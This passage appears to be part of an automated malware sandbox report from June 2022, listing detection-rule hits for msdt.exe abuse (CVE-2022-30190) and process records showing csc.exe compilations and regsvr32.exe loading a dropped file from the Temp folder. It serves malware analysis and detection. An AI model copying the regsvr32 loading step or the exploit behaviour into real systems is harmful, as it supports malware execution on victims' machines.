• Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000009.00000002.729808859.0000000002830000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
• Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000009.00000002.729847278.0000000002838000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
• Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000009.00000002.729643897.00000000026B0000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
• Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000009.00000002.730773001.0000000002AB0000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
Reputation: moderate

Target ID: 18
Start time: 17:40:43
Start date: 07/06/2022
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qe5jzpda\qe5jzpda.cmdline
Imagebase: 0xda0000
File size: 2170976 bytes
MD5 hash: 350C52F71BDED7B99668585C15D70EEA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: moderate

Target ID: 19
Start time: 17:40:46
                                                                                                                                                                            Start date:07/06/2022
                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES374A.tmp" "c:\Users\user\AppData\Local\Temp\qe5jzpda\CSC4563D2ED18334995B732DDC516AA1E81.TMP"
                                                                                                                                                                            Imagebase:0x1300000
                                                                                                                                                                            File size:43176 bytes
                                                                                                                                                                            MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                            Target ID:21
                                                                                                                                                                            Start time:17:40:50
                                                                                                                                                                            Start date:07/06/2022
                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xwo13jpt\xwo13jpt.cmdline
                                                                                                                                                                            Imagebase:0xda0000
                                                                                                                                                                            File size:2170976 bytes
                                                                                                                                                                            MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                            Target ID:22
                                                                                                                                                                            Start time:17:40:52
                                                                                                                                                                            Start date:07/06/2022
                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4C97.tmp" "c:\Users\user\AppData\Local\Temp\xwo13jpt\CSC9D13466D68BE46EAAB5DAAD8B4EDFE4C.TMP"
                                                                                                                                                                            Imagebase:0x1300000
                                                                                                                                                                            File size:43176 bytes
                                                                                                                                                                            MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                            Target ID:27
                                                                                                                                                                            Start time:17:41:14
                                                                                                                                                                            Start date:07/06/2022
                                                                                                                                                                            Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\Fros.poster
                                                                                                                                                                            Imagebase:0x1c0000
                                                                                                                                                                            File size:20992 bytes
                                                                                                                                                                            MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                            Target ID:28
                                                                                                                                                                            Start time:17:41:16
                                                                                                                                                                            Start date:07/06/2022
                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ddzr0cba\ddzr0cba.cmdline
                                                                                                                                                                            Imagebase:0xda0000
                                                                                                                                                                            File size:2170976 bytes
                                                                                                                                                                            MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:.Net C# or VB.NET

                                                                                                                                                                            Target ID:29
                                                                                                                                                                            Start time:17:41:18
                                                                                                                                                                            Start date:07/06/2022
                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB3CD.tmp" "c:\Users\user\AppData\Local\Temp\ddzr0cba\CSC44E4BCADDF3245FBA3B96135AF703040.TMP"
                                                                                                                                                                            Imagebase:0x1300000
                                                                                                                                                                            File size:43176 bytes
                                                                                                                                                                            MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                            No disassembly